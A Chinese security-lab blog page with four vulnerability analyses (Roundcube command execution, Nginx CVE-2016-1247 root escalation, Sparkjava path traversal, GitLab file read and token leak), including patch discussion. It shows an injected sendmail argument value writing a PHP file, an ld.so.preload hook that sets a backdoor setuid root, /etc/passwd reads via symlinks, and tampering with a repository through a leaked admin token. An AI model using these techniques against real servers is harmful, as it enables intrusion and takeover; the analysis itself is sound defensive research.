作者：kk | Categories:安全研究 | Tags:

没有评论

Roundcube 1.2.2 远程命令执行漏洞漏洞分析

2016-12-13

Author: p0wd3r, LG (知道创宇404安全实验室) Date: 2016-12-08

0x00 漏洞概述

1.漏洞简介

著名的PHP代码审计工具 RIPS 于12月6日发布了一份针对 Roundcube的扫描报告，报告中提到了一个远程命令执行漏洞，利用该漏洞攻击者可以在授权状态下执行任意代码。官方已发布升级公告。

2.漏洞影响

触发漏洞需满足以下几个前提：

Roundcube 使用 PHP 的 mail 来发送邮件，而不通过其他 SMTP Server
PHP 的 mail 使用 sendmail 来发送邮件（默认）
PHP 的 safe_mode 是关闭的（默认）
攻击者需要知道 Web 应用的绝对路径
攻击者可以登录到 Roundcube 并可以发送邮件

成功攻击后攻击者可远程执行任意代码。

3.影响版本

1.1.x < 1.1.7

1.2.x < 1.2.3

0x01 漏洞复现

1. 环境搭建

Dockerfile:

FROM analogic/poste.io
RUN apt-get update && apt-get install -y sendmail

1 2	FROM analogic/poste.io RUN apt-get update && apt-get install -y sendmail

然后执行：

docker build -t webmail-test .

mkdir /tmp/data

docker run -p 25:25 -p 127.0.0.1:8080:80 -p 443:443 -p 110:110 -p 143:143 -p 465:465 -p 587:587 -p 993:993 -p 995:995 -v /etc/localtime:/etc/localtime:ro -v /tmp/data:/data --name webmail --hostname xxx.xxx -t webmail-test

docker cp webmail:/opt/www/webmail/config/config.inc.php /tmp/config.inc.php

vim /tmp/config.inc.php
将 $config['smtp_server'] 置为空

docker cp /tmp/config.inc.php webmail:/opt/www/webmail/config/config.inc.php

docker build -t webmail-test .

mkdir /tmp/data

docker run -p 25:25 -p 127.0.0.1:8080:80 -p 443:443 -p 110:110 -p 143:143 -p 465:465 -p 587:587 -p 993:993 -p 995:995 -v /etc/localtime:/etc/localtime:ro -v /tmp/data:/data --name webmail --hostname xxx.xxx -t webmail-test

docker cp webmail:/opt/www/webmail/config/config.inc.php /tmp/config.inc.php

vim /tmp/config.inc.php

将 $config['smtp_server'] 置为空

docker cp /tmp/config.inc.php webmail:/opt/www/webmail/config/config.inc.php

然后访问http://127.0.0.1:8080按步骤安装即可.

2.漏洞分析

首先看program/steps/mail/sendmail.inc第95-114行：

// Get sender name and address...
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST, true, $message_charset);
// ... from identity...
if (is_numeric($from)) {
    ...
}
// ... if there is no identity record, this might be a custom from
else if ($from_string = rcmail_email_input_format($from)) {
    if (preg_match('/(\S+@\S+)/', $from_string, $m))
        $from = trim($m[1], '<>');
    else
        $from = null;
}

// Get sender name and address...

$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST, true, $message_charset);

// ... from identity...

if (is_numeric($from)) {

...

}

// ... if there is no identity record, this might be a custom from

else if ($from_string = rcmail_email_input_format($from)) {

if (preg_match('/(\S+@\S+)/', $from_string, $m))

$from = trim($m[1], '<>');

else

$from = null;

}

这里取$_POST中的_from赋值给$from，如果$from不是数字就交给rcmail_email_input_format处理，处理后如果返回非空则再过滤$from，使其满足正常 email 的形式。

我们看一下rcmail_email_input_format，在program/steps/mail/sendmail.inc第839-896行：

function rcmail_email_input_format($mailto, $count=false, $check=true)
{
    global $RCMAIL, $EMAIL_FORMAT_ERROR, $RECIPIENT_COUNT;

    // simplified email regexp, supporting quoted local part
    $email_regexp = '(\S+|("[^"]+"))@\S+';

    $delim   = trim($RCMAIL->config->get('recipients_separator', ','));
    $regexp  = array("/[,;$delim]\s*[\r\n]+/", '/[\r\n]+/', "/[,;$delim]\s*\$/m", '/;/', '/(\S{1})(<'.$email_regexp.'>)/U');
    $replace = array($delim.' ', ', ', '', $delim, '\\1 \\2');

    // replace new lines and strip ending ', ', make address input more valid
    $mailto = trim(preg_replace($regexp, $replace, $mailto));
    $items  = rcube_utils::explode_quoted_string($delim, $mailto);
    $result = array();

    foreach ($items as $item) {
        $item = trim($item);
        // address in brackets without name (do nothing)
        if (preg_match('/^<'.$email_regexp.'>$/', $item)) {
            ...
        }
        // address without brackets and without name (add brackets)
        else if (preg_match('/^'.$email_regexp.'$/', $item)) {
            ...
        }
        // address with name (handle name)
        else if (preg_match('/<*'.$email_regexp.'>*$/', $item, $matches)) {
            ...
        }
        else if (trim($item)) {
            continue;
        }
        ...
    }

    ...

    return implode(', ', $result);
}

function rcmail_email_input_format($mailto, $count=false, $check=true)

{

global $RCMAIL, $EMAIL_FORMAT_ERROR, $RECIPIENT_COUNT;

// simplified email regexp, supporting quoted local part

$email_regexp = '(\S+|("[^"]+"))@\S+';

$delim = trim($RCMAIL->config->get('recipients_separator', ','));

$regexp = array("/[,;$delim]\s*[\r\n]+/", '/[\r\n]+/', "/[,;$delim]\s*\$/m", '/;/', '/(\S{1})(<'.$email_regexp.'>)/U');

$replace = array($delim.' ', ', ', '', $delim, '\\1 \\2');

// replace new lines and strip ending ', ', make address input more valid

$mailto = trim(preg_replace($regexp, $replace, $mailto));

$items = rcube_utils::explode_quoted_string($delim, $mailto);

$result = array();

foreach ($items as $item) {

$item = trim($item);

// address in brackets without name (do nothing)

if (preg_match('/^<'.$email_regexp.'>$/', $item)) {

...

}

// address without brackets and without name (add brackets)

else if (preg_match('/^'.$email_regexp.'$/', $item)) {

...

}

// address with name (handle name)

else if (preg_match('/<*'.$email_regexp.'>*$/', $item, $matches)) {

...

}

else if (trim($item)) {

continue;

}

...

}

...

return implode(', ', $result);

}

foreach中的正则仅匹配正常的from格式，即xxx@xxx，如果匹配不到则continue，所以如果我们提交xxx@xxx -a -b这样的“空格 + 数据”，函数最终并没有对其进行改变，返回的$result也就是空了，进而执行完函数后不会再对$from进行过滤。

接下来在program/steps/mail/sendmail.inc第528行：

$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto, $smtp_error, $mailbody_file, $smtp_opts);

1	$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto, $smtp_error, $mailbody_file, $smtp_opts);

$from被传入了deliver_message中，在program/lib/Roundcube/rcube.php第1524-1678行：

public function deliver_message(&$message, $from, $mailto, &$error, &$body_file = null, $options = null)
{

    // send thru SMTP server using custom SMTP library
    if ($this->config->get('smtp_server')) {
        ...
    }
    // send mail using PHP's mail() function
    else {
        ...
        if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
            $sent = mail($to, $subject, $msg_body, $header_str);
        else
            $sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
        }
    }
    ...
}

public function deliver_message(&$message, $from, $mailto, &$error, &$body_file = null, $options = null)

{

// send thru SMTP server using custom SMTP library

if ($this->config->get('smtp_server')) {

...

}

// send mail using PHP's mail() function

else {

...

if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))

$sent = mail($to, $subject, $msg_body, $header_str);

else

$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");

}

...

}

可以看到当我们使用PHP的mail函数来发送邮件时$from会被拼接到mail的第五个参数中，这个参数的用处如下：

意思就是PHP的mail默认使用/usr/sbin/sendmail发送邮件（可在php.ini中设置），mail的第五个参数就是设置sendmail的额外参数。

sendmail有一个-X参数，该参数将邮件流量记录在指定文件中：

所以到这里攻击思路如下：

构造邮件内容为想要执行的代码
点击发送时抓包更改_from
sendmail将流量记录到 php 文件中

实际操作一下：

首先登录 Roundcube 并开始发送邮件：

点击发送，截包修改：

其中将_from改成：example@example.com -OQueueDirectory=/tmp -X/path/rce.php，其中-X后的路径需根据具体服务器情况来设置，默认 Roundcube 根目录下temp/、logs/是可写的。然后将_subject改成我们想要执行的代码，这里是<?php phpinfo();?>。

请求有可能会超时，但是并不影响文件的写入。

发送过后触发漏洞：

3.补丁分析

使用escapeshellarg让$from被解析为参数值。

0x02 修复方案

升级程序：https://roundcube.net/news/2016/11/28/updates-1.2.3-and-1.1.7-released

0x03 参考

Roundcube 扫描报告：
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
PHP 的 mail 函数：
http://php.net/manual/zh/function.mail.php

作者：kk | Categories:安全研究 | Tags:

没有评论

Nginx权限提升漏洞(CVE-2016-1247) 分析

2016-11-23

Author:xd0ol1(知道创宇404实验室) data:2016-11-17

0x00 漏洞概述

1.漏洞简介

11月15日，国外安全研究员 Dawid Golunski 公开了一个新的Nginx漏洞（CVE-2016-1247），能够影响基于 Debian 系列的发行版，Nginx 作为目前主流的一个多用途服务器，因而其危害还是比较严重的，官方对此漏洞已经进行了修复。

2.漏洞影响

Nginx服务在创建log目录时使用了不安全的权限设置，可造成本地权限提升，恶意攻击者能够借此实现从 nginx/web 的用户权限 www-data 到 root 用户权限的提升。

3.影响版本

下述版本之前均存在此漏洞：
Debian: Nginx1.6.2-5+deb8u3
Ubuntu 16.04: Nginx1.10.0-0ubuntu0.16.04.3
Ubuntu 14.04: Nginx1.4.6-1ubuntu3.6
Ubuntu 16.10: Nginx1.10.1-0ubuntu1.1

0x01 漏洞复现

1.环境搭建

测试环境：Ubuntu 14.04: Nginx1.4.6-1ubuntu3

PoC详见如下链接，给出的 nginxed-root.sh 脚本在其中的第V部分：
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

2.漏洞触发

恶意者可通过软链接任意文件来替换日志文件，从而实现提权以获取服务器的 root 权限，执行 PoC 后结果如下图：

提示要等待，但我们可以通过如下命令进行触发：

/usr/sbin/logrotate -vf /etc/logrotate.d/nginx

1	/usr/sbin/logrotate -vf /etc/logrotate.d/nginx

提权后的结果如下：

3.漏洞利用分析

一般来说，如果想要修改函数的功能，最直接的就是对其源码进行更改，但很多情况下我们是无法达成此目标的，这时就可以借助一些hook操作来改变程序的流程，从而实现对函数的修改。在 Linux 系统下，我们可以通过编译一个含相同函数定义的 so 文件并借助/etc/ld.so.preload文件来完成此操作，系统的 loader 代码中会检查是否存在/etc/ld.so.preload 文件，如果存在那么就会加载其中列出的所有 so 文件，它能够实现与 LD_PRELOAD 环境变量相同的功能且限制更少，以此来调用我们定义的函数而非原函数。此方法适用于用户空间的so文件劫持，类似于 Windows 下的 DLL 劫持技术。更进一步，如果我们将此技巧与含有suid的文件结合起来，那么就可以很自然的实现提权操作了，所给的 PoC 就是利用的这个技巧。

关于 hook 操作，简单来看就是如下的一个执行流程：

在 PoC 利用中与此相关的 C 代码如下所示，如果将其编译成so文件并把路径写入到/etc/ld.so.preload文件的话，那么可以实现对 geteuid()函数的 hook，在 hook 调用中就能执行我们想要的恶意操作。

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/*hook原geteuid()函数*/
uid_t geteuid(void) {
    //定义函数指针变量
    static uid_t  (*old_geteuid)();
    //返回原geteuid()函数的指针
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    //在调用原geteuid()函数的同时执行想要的恶意操作
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}

#define _GNU_SOURCE

#include <stdio.h>

#include <sys/stat.h>

#include <unistd.h>

#include <dlfcn.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

/*hook原geteuid()函数*/

uid_t geteuid(void) {

//定义函数指针变量

static uid_t (*old_geteuid)();

//返回原geteuid()函数的指针

old_geteuid = dlsym(RTLD_NEXT, "geteuid");

//在调用原geteuid()函数的同时执行想要的恶意操作

if ( old_geteuid() == 0 ) {

chown("$BACKDOORPATH", 0, 0);

chmod("$BACKDOORPATH", 04777);

unlink("/etc/ld.so.preload");

}

return old_geteuid();

}

我们可以将上述代码编译后来做个简单的测试，结果如下图，观察 nginxrootsh 文件前后属性的变化以及/etc/ld.so.preload文件存在与否可以判断我们的恶意操作是否执行了，很显然 hook 是成功的，和 PoC 相同这里也是通过sudo来触发hook调用。

接下来我们考虑下如何将内容写进/etc/ld.so.preload文件，也就是本次漏洞的所在，Nginx 在配置 log 文件时采用的不安全权限设置使得我们能很容易的实现此目的，从而实现 www-data 到 root 的权限提升。为了看的更清楚，我们首先将目录/var/log/nginx/下的文件全部删除，再重启下 nginx 服务，最后执行如下两条命令：

$ curl http://localhost/ >/dev/null 2>/dev/null
$ /usr/sbin/logrotate -vf /etc/logrotate.d/nginx

1 2	$ curl http://localhost/ >/dev/null 2>/dev/null $ /usr/sbin/logrotate -vf /etc/logrotate.d/nginx

此时得到的结果如下图所示：

可以看到 error.log 文件的属性为：

-rw-r--r-- 1 www-data root 0 Nov 18 14:49 error.log

1	-rw-r--r-- 1 www-data root 0 Nov 18 14:49 error.log

将其软链接到/etc/ld.so.preload 文件就可以了，这里为了简单测试，我们将其软链接到/etc/xxxxxxxxxx，同样需要上述那两条触发命令。从上图中我们看到了成功结果，此时 www-data 用户是可以对/etc/xxxxxxxxxx文件进行写操作的。

至此，我们将这些点结合起来就可以实现对此漏洞的利用了。

0x02 修复方案

Nginx官方已经修复，用户应尽快更新至最新版本。

详细信息：

Debian 系统

https://www.debian.org/security/2016/dsa-3701

https://security-tracker.debian.org/tracker/CVE-2016-1247

Ubuntu 系统

https://www.ubuntu.com/usn/usn-3114-1/

0x03 参考

https://www.seebug.org/vuldb/ssvid-92538
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
https://minipli.wordpress.com/2009/07/17/ld_preload-vs-etcld-so-preload/
http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/

作者：kk | Categories:安全研究 | Tags:

没有评论

Sparkjava Framework 文件遍历漏洞(CVE-2016-9177)分析与探究

2016-11-17

Author:dawu(知道创宇404实验室) data:2016-11-16

0x00 漏洞概述

1.漏洞简介

Sparkjava是一款小型的web框架，它能够让你以很少的代码构建出一个java web应用。近日，某国外安全研究人员发现其存在文件遍历漏洞，可以通过该漏洞读取任意文件内容。在对这个漏洞进行复现与分析的时候，我们又发现了一些可能可以利用的地方，但是利用条件更加苛刻。

2.漏洞影响

Sparkjava版本 < 2.5.2

0x01 漏洞复现

1.验证环境

Jdk-1.8.111 Apache maven 3.3.9 在写好Sparkjava代码后，在文件所在目录打开命令行，运行mvn package进行编译打包。

2.漏洞复现

根据官网给出的示例，我们写了一个简单的函数去复现这个漏洞:

public class Hello {

    public static void main(String[] args) {
        staticFiles.externalLocation(“/tmp”);
        get("/", (req, res) -&gt; {
            return "hello from sparkjava.com";
        });
    }
}

public class Hello {

public static void main(String[] args) {

staticFiles.externalLocation(“/tmp”);

get("/", (req, res) -> {

return "hello from sparkjava.com";

});

}

pom.xml的配置为xml <dependency> <groupId>com.sparkjava</groupId> <artifactId>spark-core</artifactId> <version>2.5</version> </dependency>这里提供已经打包好的jar文件供大家下载。可以用如下命令运行:bash java -jar sparkexample-jar-with-dependencies.jar 我们可以通过(..\)来改变路径从而读取任意文件。如图，我们读取到/etc/passwd:

在漏洞发现者的描述中，Spark.staticFileLocation()和Spark.externalStaticFileLocation()这两个函数都存在这个问题。经过开发者测试，在IDE中运行时，两个函数都可以复现这个漏洞;运行打包好的jar包时，只有Spark.externalStaticFileLocation()这个函数可以触发漏洞。

0x02 补丁分析与深入研究

1.补丁分析

很明显，在漏洞被发现时，官方没有对url中的路径做任何处理。在漏洞被修补之后，官方推出了新的版本2.5.2。这里我们对比之前的版本，并且通过调试，尝试分析官方的修补方案。官方修补链接(https://github.com/perwendel/spark/commit/efcb46c710e3f56805b9257a63d1306882f4faf9) 当我们正常请求时：bash curl "127.0.0.1:4567/l.txt" 跟到关键代码处，我们可以看到在判断文件是否存在之后，官方添加了DirectoryTraversal.protectAgainstInClassPath(resource.getPath());进行判断。

这里，path就是我们HTTP请求的地址，addedPath就是我们通过staticFiles.externalLocation()函数设置的路径与path拼接之后的值，resource中的file的值就是addedPath值经过路径的处理的值(例如：/tmp/test/..\l.txt先将所有的\换成/，再对路径进行处理，最后结果为/tmp/l.txt),resource.getPath()就是addedPath的值。

在protectAgainstInClassPath()函数中，需要判断removeLeadingAndTrailingSlashesFrom(path).startsWith(StaticFilesFolder.external())是否为false，为false就抛出。

removeLeadingAndTrailingSlashesFrom(path)为新添加的函数，作用是将path首尾的/去掉和将尾部的\去掉。在这里经过处理之后，path的值为tmp/l.txt。

StaticFilesFolder.external()则是返回external的值，在这里就是tmp。如果removeLeadingAndTrailingSlashesFrom(path）前面的字母是tmp，则进入下一步。

综上所述，官方通过比较经过处理后的路径的开头和我们设置的externalLocation()的路径是否相同来防止我们利用..\读取任意文件。

2.深入探究

我们修改了pom.xml，使用新的Sparkjava版本进行编译尝试，做了如下探究。xml <dependency> <groupId>com.sparkjava</groupId> <artifactId>spark-core</artifactId> <version>2.5.2</version> </dependency>

①软链接的利用

与Sparkjava(CVE-2016-9177)同时爆出来的一个漏洞GitLab的任意文件读取(CVE-2016-9086)是利用软链接的特性，我们就顺手测试了软链接在Sparkjava下的利用。直接读取文件:

怎么才能利用软链接呢？这里的利用条件比较苛刻。笔者想到了两种途径： 1.网站允许上传压缩包，上传后解压并且还能访问到解压后的文件才能利用 2.网站通过wget(wget配置文件中需要retr-symlinks=on)从ftp上下载文件并且能够访问到下载的文件。

②再次读取文件

我们在根目录下新建两个文件tmp.txt，tmp2.txt

再访问

读取到了tmp.txt和tmp2.txt的内容。我们分析一下能够再次读取的原因，当我们请求为： bash curl “127.0.0.1:4567/tmp\..\..\tmp.txt” 分析过滤代码处：

addedPath的值为/tmp/tmp/..\..\tmp.txt，经过处理后resource中的file值为/tmp.txt，对于下面的函数removeLeadingAndTrailingSlashesFrom(path).startsWith(StaticFilesFolder.external())，由于tmp.txt也是由tmp开头，所以判断可以通过，进而读取到tmp.txt。

同样的道理，我们也可以读取到/tmp2/test.txt的内容。

通过以上分析，笔者认为这个读取很鸡肋，首先staticFiles.externalLocation()中定义的路径只能是一级路径，其次我们要读取的文件的完整路径开头必须和staticFiles.externalLocation()中定义的路径相同。这就限制了这个新的读取，也许只有在某些特定的场合才能有奇效。

如有错误，欢迎指正:)

0x03 参考链接

1.https://www.seebug.org/vuldb/ssvid-92517 2.http://seclists.org/fulldisclosure/2016/Nov/13 3.https://github.com/perwendel/spark/commit/efcb46c710e3f56805b9257a63d1306882f4faf9 4.https://github.com/perwendel/spark/issues/700 5.http://sparkjava.com/documentation.html

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

GitLab 任意文件读取漏洞 (CVE-2016-9086) 和任意用户 token 泄露漏洞分析

2016-11-10

Author:dawu,LG(知道创宇404安全实验室) Data:2016-10-09

0x00 漏洞概述

1.漏洞简介

GitLab 是一个利用Ruby on Rails开发的开源应用程序，实现一个自托管的Git项目仓库，可通过Web界面进行访问公开的或者私人项目。近日研究者发现在其多个版本中存在文件读取漏洞(CVE-2016-9086) 和任意用户authentication_token泄漏漏洞，攻击者可以通过这两个漏洞来获取管理员的权限，进而控制所有gitlab项目。

2.漏洞影响

任意文件读取漏洞(CVE-2016-9086):
GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13
任意用户authentication_token泄露漏洞：
Gitlab CE/EE versions 8.10.3-8.10.5

0x01 漏洞复现

1.环境搭建

sudo apt-get install curl openssh-server ca-certificates postfix
curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash
sudo apt-get install gitlab-ce=8.10.3-ce.1  
sudo gitlab-ctl reconfigure

sudo apt-get install curl openssh-server ca-certificates postfix

curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash

sudo apt-get install gitlab-ce=8.10.3-ce.1

sudo gitlab-ctl reconfigure

这里使用8.10.3版本是为了任意用户authentication_token泄露漏洞的复现。

安装完成后，访问服务器80端口即可看到GitLab登录页面。

注：8.9.0-8.13.0版本的GitLab的项目导入功能需要管理员开启，8.13.0版本之后所有用户都可以使用导入功能。管理员可以访问http://domain/admin/application_settings 开启，开启之后用任意用户新建项目的时候，可以在import project from一项中看到gitlab export。

2.漏洞分析

任意文件读取漏洞(CVE-2016-9086)

从8.9.0版本开始，GitLab新增了导入导出项目的功能。
一个空的gitlab项目导出后结构如下：

其中VERSION文件内容为GitLab的导出模块的版本，project.json则包含了项目的配置文件。

当我们导入GitLab的导出文件的时候，GitLab会按照如下步骤处理： 1.服务器根据VERSION文件内容检测导出文件版本，如果版本符合，则导入。
2.服务器根据Project.json文件创建一个新的项目，并将对应的项目文件拷贝到服务器上对应的位置。

检测VERSION文件的代码位于：/lib/gitlab/import_export/version_checker.rb中：

...
def check!  
  version = File.open(version_file, &:readline)
  verify_version!(version)
rescue => e  
  shared.error(e)
  false
end  
...
def verify_version!(version)  
    if Gem::Version.new(version) != Gem::Version.new(Gitlab::ImportExport.version)
        raise Gitlab::ImportExport::Error.new("Import version mismatch: Required #{Gitlab::ImportExport.version} but was #{version}")
    else
        true
    end
end  
...

...

def check!

version = File.open(version_file, &:readline)

verify_version!(version)

rescue => e

shared.error(e)

false

end

...

def verify_version!(version)

if Gem::Version.new(version) != Gem::Version.new(Gitlab::ImportExport.version)

raise Gitlab::ImportExport::Error.new("Import version mismatch: Required #{Gitlab::ImportExport.version} but was #{version}")

else

true

end

...

我们可以看到这里的逻辑是读取VERSION文件的第一行赋值给变量version，然后检测verison与当前版本是否相同，相同返回true，不相同则返回错误信息(错误信息中包括变量version的值). 于是漏洞发现者Jobert Abma巧妙的使用了软链接来达到读取任意文件的目的。首先，我们给VERSION文件加上软链接并重新打包。

ln -sf /etc/passwd VERSION  
tar zcf change_version.tar.gz ./

1 2	ln -sf /etc/passwd VERSION tar zcf change_version.tar.gz ./

这样，读取VERSION文件的时候服务器就会根据软链接读取到/etc/passwd的第一行内容并赋值给version。但是由于version与当前版本不相同，所以会输出version的值，也就是/etc/passwd第一行的内容。

访问之前搭建好的GitLab服务器，创建一个新的项目，填写完项目名称后在Import project from一栏中选择GitLab export，上传我们修改后的导入包，然后就可以看到/etc/passwd文件第一行

但是，如果只读取任意文件的第一行，能做的事情还是太少了。漏洞发现者显然不满足这一结果，他继续找了下去.
读取Project.json这一配置文件的代码位于：/lib/gitlab/import_export/project_tree_restorer.rb中：

...
def restore  
  json = IO.read(@path)
  tree_hash = ActiveSupport::JSON.decode(json)
  project_members = tree_hash.delete('project_members')

  ActiveRecord::Base.no_touching do
    create_relations
  end
rescue => e  
  shared.error(e)
  false
end  
...

...

def restore

json = IO.read(@path)

tree_hash = ActiveSupport::JSON.decode(json)

project_members = tree_hash.delete('project_members')

ActiveRecord::Base.no_touching do

create_relations

end

rescue => e

shared.error(e)

false

end

...

在这里，我们可以再次使用软链接使变量json获取到任意文件的内容，但是由于获取的文件不是json格式，无法decode，导致异常抛出，最终在前端显示出任意文件的内容。添加软链接并打包:

ln -sf /etc/passwd project.json  
tar zcf change_version.tar.gz ./

1 2	ln -sf /etc/passwd project.json tar zcf change_version.tar.gz ./

上传导出包，页面上显示的结果：

任意用户authentication_token泄露漏洞

复现步骤为：

1.注册一个普通用户，创建一个新的项目
2.在项目的member选项中，添加管理员到项目中。

3.点击edit project,找到Export project部分，点击Export project，等待几分钟去查看注册邮箱收到的下载地址或者刷新页面，点击Download export下载导出包。

4.导出包的project.json中已经含有了管理员的authentication_token。

得到authentication_token之后我们就可以通过api做管理员可以做的事情了，比如查看管理员所在的项目：

分析原因：

我们在\app\controllers\projects_controller.rb中找到了export函数，这个函数被用来导出项目文件。

def export
  @project.add_export_job(current_user: current_user)

  redirect_to(
    edit_project_path(@project),
    notice: "Project export started. A download link will be sent by email."
  )
end

def export

@project.add_export_job(current_user: current_user)

redirect_to(

edit_project_path(@project),

notice: "Project export started. A download link will be sent by email."

)

end

往下跟add_export_job(),在\app\models\project.rb中：

def add_export_job(current_user:)
  job_id = ProjectExportWorker.perform_async(current_user.id, self.id)

  if job_id
    Rails.logger.info "Export job started for project ID #{self.id} with job ID #{job_id}"
  else
    Rails.logger.error "Export job failed to start for project ID #{self.id}"
  end
end

def add_export_job(current_user:)

job_id = ProjectExportWorker.perform_async(current_user.id, self.id)

if job_id

Rails.logger.info "Export job started for project ID #{self.id} with job ID #{job_id}"

else

Rails.logger.error "Export job failed to start for project ID #{self.id}"

end

继续到\app\workers\project_export_worker.rb文件的ProjectExportWorker.perform_async():

class ProjectExportWorker  
  include Sidekiq::Worker

  sidekiq_options queue: :gitlab_shell, retry: 3

  def perform(current_user_id, project_id)
    current_user = User.find(current_user_id)
    project = Project.find(project_id)

    ::Projects::ImportExport::ExportService.new(project, current_user).execute
  end
end

class ProjectExportWorker

include Sidekiq::Worker

sidekiq_options queue: :gitlab_shell, retry: 3

def perform(current_user_id, project_id)

current_user = User.find(current_user_id)

project = Project.find(project_id)

::Projects::ImportExport::ExportService.new(project, current_user).execute

end

这里我们可以看到current获取的是User.find(current_user_id)的内容，然后调用::Projects::ImportExport::ExportService.new(project, current_user).execute 由于笔者之前没有接触过ruby，这里只好采用gitlab-rails console来找到User.find()的值。可以看到，在User.find()中,存在authentication_token的值。

跟到\app\services\project\import_export\export_service.rb，这里执行version_saver, avatar_saver, project_tree_saver, uploads_saver, repo_saver, wiki_repo_saver这五个函数来写各种导出文件，其中project_tree_saver()负责导出project.json

module Projects  
  module ImportExport
    class ExportService < BaseService
      def execute(_options = {})
        @shared = Gitlab::ImportExport::Shared.new(relative_path: File.join(project.path_with_namespace, 'work'))
        save_all
      end

      private

      def save_all
        if [version_saver, avatar_saver, project_tree_saver, uploads_saver, repo_saver, wiki_repo_saver].all?(&:save)
          Gitlab::ImportExport::Saver.save(project: project, shared: @shared)
          notify_success
        else
          cleanup_and_notify
        end
      end

      def version_saver
      ...
    end
  end
end

module Projects

module ImportExport

class ExportService < BaseService

def execute(_options = {})

@shared = Gitlab::ImportExport::Shared.new(relative_path: File.join(project.path_with_namespace, 'work'))

save_all

end

private

def save_all

if [version_saver, avatar_saver, project_tree_saver, uploads_saver, repo_saver, wiki_repo_saver].all?(&:save)

Gitlab::ImportExport::Saver.save(project: project, shared: @shared)

notify_success

else

cleanup_and_notify

end

def version_saver

...

end

跳过之后的几个繁琐的调用之后，执行了lib/gitlab/import_export/json_hash_builder.rb中的create_model_value函数。

# Constructs a new hash that will hold the configuration for that particular object
# It may include exceptions or other attribute detail configuration, parsed by +@attributes_finder+
#
# +current_key+ main model that will be a key in the hash
# +value+ existing model to be included in the hash
# +json_config_hash+ the original hash containing the root model
def create_model_value(current_key, value, json_config_hash)
  parsed_hash = { include: value }
  parse_hash(value, parsed_hash)
  json_config_hash[current_key] = parsed_hash
end

  # Calls attributes finder to parse the hash and add any attributes to it
  #
  # +value+ existing model to be included in the hash
  # +parsed_hash+ the original hash
  def parse_hash(value, parsed_hash)
    @attributes_finder.parse(value) do |hash|
      parsed_hash = { include: hash_or_merge(value, hash) }
    end
  end

# Constructs a new hash that will hold the configuration for that particular object

# It may include exceptions or other attribute detail configuration, parsed by +@attributes_finder+

# +current_key+ main model that will be a key in the hash

# +value+ existing model to be included in the hash

# +json_config_hash+ the original hash containing the root model

def create_model_value(current_key, value, json_config_hash)

parsed_hash = { include: value }

parse_hash(value, parsed_hash)

json_config_hash[current_key] = parsed_hash

end

# Calls attributes finder to parse the hash and add any attributes to it

# +value+ existing model to be included in the hash

# +parsed_hash+ the original hash

def parse_hash(value, parsed_hash)

@attributes_finder.parse(value) do |hash|

parsed_hash = { include: hash_or_merge(value, hash) }

end

这里出现了逻辑问题，由于parsed_hash这个变量不是全局变量，所以create_model_value()中执行parse_hash()时，parse_hash()中的parsed_hash被改变，但是create_model_value()函数中的parsed_hash不会变，这就造成了parse_hash()这个函数执行后create_model_value()中parsed_hash这个值并没有改变。因此最后导出的文件包含了authentication_token。

我们在gitlab-rails console里展示了这两者的区别。当value=user的时候，parsed_hash={:include=>:user}，输出的结果如同图中的user.as_json()，会将所有内容输出，包括authentication_token。当parsed_hash为经过parse_hash()处理后的{:include=>{:user=>{:only=>[:id, :email, :username]}}}时，输出结果与user.as_json(only: [:id, :email, :username])相同。

后续RCE方式的探讨

在hackone的两个报告中，漏洞发现者都提到了leads to RCE，笔者尝试去实现这一点。由于GitLab源码在gitlab.com上，所以当获取了GitLab的管理员权限后，我们可以通过authentication_token修改GitLab项目的源码，留下自己的后门。为了重现这种情况，我们在本地新建一个新的项目去通过authentication_token和GitLab api来修改项目文件。

用root账户创建一个项目:test_rce，其中README.md的内容为created by root

接下来，我们要用gitlab的api来修改它。首先，根据projects的api找到test_rce项目对应的id，这里是18

curl -H "PRIVATE-TOKEN: wTPMMapDwpfkKfNws7xp" "http://domain/api/v3/projects"

1	curl -H "PRIVATE-TOKEN: wTPMMapDwpfkKfNws7xp" "http://domain/api/v3/projects"

我们再根据api读取一下文件

curl -H "PRIVATE-TOKEN: wTPMMapDwpfkKfNws7xp" "http://domain/api/v3/projects/18/repository/files?file_path=README.md&ref=master"

1	curl -H "PRIVATE-TOKEN: wTPMMapDwpfkKfNws7xp" "http://domain/api/v3/projects/18/repository/files?file_path=README.md&ref=master"

这里，content为Y3JlYXRlZCBieSByb290，这是文件内容被base64加密后的结果，解密一下就可以看到created by root

根据api的要求，我们通过PUT数据来修改文件，将README.md修改为change by notroot。当我们再读一次，content内容为：Y2hhbmdlIGJ5IG5vdHJvb3Q=，解码之后就是change by notroot

不得不说，笔者所实现的这种方式攻击时间跨度很长，能否执行命令取决于开发者下一次更新的时间，这也是这种方法的缺点之一。

0x02 官方修复分析

任意文件读取漏洞(CVE-2016-9086)修复分析

我们可以看到，官方先移除了导入包里的软连接，其次，读取VERSION的内容和project.json的内容出错后将内容输出到日志里而非返回到前端。

任意用户authentication_token泄露漏洞修复分析

官方让json_config_hash[current_key]获取到parse_hash()处理后的值。

0x03 参考

